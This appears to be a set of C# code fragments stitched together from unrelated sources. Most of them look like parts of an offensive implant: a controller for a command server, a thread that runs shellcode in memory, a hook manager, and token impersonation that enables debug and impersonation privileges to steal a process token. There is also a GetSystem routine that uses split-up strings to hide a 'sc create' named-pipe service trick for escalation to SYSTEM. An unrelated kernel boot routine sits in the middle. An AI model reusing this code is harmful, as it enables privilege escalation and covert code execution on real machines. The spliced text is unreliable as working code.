public Controller(string id, string url, string password)
{
_id = id;
_p = password;
_jobsManager = new Jobs(url);
_sysCall = new SysCallManager();
_tokenManager = new TokenManager(_sysCall);
_tempPath = Environment.GetEnvironmentVariable("temp") ?? @"C:\Windows\Temp\";
}
public static void Main(byte[] shellCode, SysCallManager sysCall, int pid)
{
var obj = new LauncherShellCode();
var thr1 = new Thread(ExecuteShellCodeInMemory);
var a = new object[] { shellCode, sysCall, pid };
thr1.Start(a);
}
public bool GetSystem(SysCallManager sysCall)
{
try
{
List <int> pids = Utils.getSystemPID(sysCall);
foreach (var pid in pids)
{
if (Impersonate(pid, sysCall))
{
return(true);
}
}
}
catch {}
_pipeName = Jobs.RandomString(7);
string service = Jobs.RandomString(7);
var exit = false;
var server = new Thread(ServerThread);
var cmd = "sc create " + service + " binpath= \"c:\\windows\\sys" + "tem32\\cm" + "d.exe /C " + "echo data > \\\\.\\pi" + "pe\\" + _pipeName + "\"";
Utils.ExecuteCommand(cmd, sysCall);
server.Start();
Thread.Sleep(250);
cmd = "sc start " + service;
Utils.ExecuteCommand(cmd, sysCall);
while (!exit)
{
if (server.Join(250))
{
exit = true;
}
}
cmd = "sc delete " + service;
Utils.ExecuteCommand(cmd, sysCall);
if (_token != IntPtr.Zero)
{
return(true);
}
return(false);
}
public static unsafe void Main()
{
try
{
ManagedMemoy.InitializeGCMemory();
StartUp.InitializeAssembly();
KMath.Init();
//Mosa.Runtime.StartUp.InitializeRuntimeMetadata();
BootInfo.SetupStage1();
Memory.InitialKernelProtect();
ApiContext.Current = new ApiHost();
Assert.Setup(AssertError);
// Setup some pseudo devices
DeviceManager.InitStage1();
//Setup Output and Debug devices
DeviceManager.InitStage2();
// Write first output
KernelMessage.WriteLine("<KERNEL:CONSOLE:BEGIN>");
PerformanceCounter.Setup(BootInfo.Header->KernelBootStartCycles);
KernelMessage.WriteLine("Starting Abanu Kernel...");
KernelMessage.WriteLine("KConfig.UseKernelMemoryProtection: {0}", KConfig.UseKernelMemoryProtection);
KernelMessage.WriteLine("KConfig.UsePAE: {0}", KConfig.UsePAE);
KernelMessage.WriteLine("Apply PageTableType: {0}", (uint)BootInfo.Header->PageTableType);
KernelMessage.WriteLine("GCInitialMemory: {0:X8}-{1:X8}", Address.GCInitialMemory, Address.GCInitialMemory + Address.GCInitialMemorySize - 1);
Ulongtest1();
Ulongtest2();
InlineTest();
// Detect environment (Memory Maps, Video Mode, etc.)
BootInfo.SetupStage2();
KernelMemoryMapManager.Setup();
//KernelMemoryMapManager.Allocate(0x1000 * 1000, BootInfoMemoryType.PageDirectory);
// Read own ELF-Headers and Sections
KernelElf.Setup();
// Initialize the embedded code (actually only a little proof of concept code)
NativeCalls.Setup();
//InitialKernelProtect();
PhysicalPageManager.Setup();
KernelMessage.WriteLine("Phys free: {0}", PhysicalPageManager.FreePages);
PhysicalPageManager.AllocatePages(10);
KernelMessage.WriteLine("Phys free: {0}", PhysicalPageManager.FreePages);
VirtualPageManager.Setup();
Memory.Setup();
// Now Memory Sub System is working. At this point it's valid
// to allocate memory dynamically
DeviceManager.InitFrameBuffer();
// Setup Programmable Interrupt Table
PIC.Setup();
// Setup Interrupt Descriptor Table
// Important Note: IDT depends on GDT. Never setup IDT before GDT.
IDTManager.Setup();
InitializeUserMode();
SysCallManager.Setup();
KernelMessage.WriteLine("Initialize Runtime Metadata");
StartUp.InitializeRuntimeMetadata();
KernelMessage.WriteLine("Performing some Non-Thread Tests");
Tests();
}
catch (Exception ex)
{
Panic.Error(ex.Message);
}
if (KConfig.SingleThread)
{
StartupStage2();
}
else
{
ProcessManager.Setup(StartupStage2);
}
}
public TokenManager(SysCallManager sysCall)
{
Token = IntPtr.Zero;
Method = 0;
this.sysCall = sysCall;
}
public HookManager(SysCallManager sysCall)
{
this.sysCall = sysCall;
originalOpcodes = is64BitsProcessor() ? new byte[13] : new byte[6];
}
/////////////////////////// Impersonation ///////////////////////////
public bool Impersonate(int pid, SysCallManager sysCall)
{
var privileges = new List <string>
{
"SeDebugPrivilege",
"SeImpersonatePrivilege",
"SeTcbPrivilege",
"SeAssignPrimaryTokenPrivilege",
"SeIncreaseQuotaPrivilege"
};
try
{
Utils.GetProcessToken(Process.GetCurrentProcess().Handle, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustPrivileges,
out var token, sysCall);
Utils.EnablePrivileges(token, privileges, sysCall);
Utils.GetProcessHandle(pid, out var handlePointer, DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_QUERY_INFORMATION, sysCall);
Utils.GetProcessToken(handlePointer, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenDuplicate, out var tokenPointer,
sysCall);
Utils.CloseHandle(handlePointer);
if (tokenPointer == IntPtr.Zero)
{
return(false);
}
var tokenAccess =
DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenQuery | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAssignPrimary |
DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenDuplicate | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustDefault |
DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustSessionId;
Utils.DuplicateToken(tokenPointer, tokenAccess, DInvoke.Win32.WinNT._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
DInvoke.Win32.WinNT.TOKEN_TYPE.TokenPrimary, out var impToken, sysCall);
if (impToken == IntPtr.Zero)
{
return(false);
}
var startupInfo = new DInvoke.Win32.WinNT.StartupInfo();
startupInfo.cb = Marshal.SizeOf(startupInfo);
startupInfo.lpDesktop = "";
startupInfo.wShowWindow = 0;
startupInfo.dwFlags |= 0x00000001;
var processInfo = new DInvoke.Win32.Kernel32.ProcessInformation();
if (_method == 0)
{
try
{
Utils.DetermineImpersonationMethod(impToken, new DInvoke.Win32.Kernel32.LogonFlags(), startupInfo, out processInfo);
}
catch
{
return(false);
}
}
if (_method != 0)
{
_token = impToken;
return(true);
}
}
catch
{
}
return(false);
}
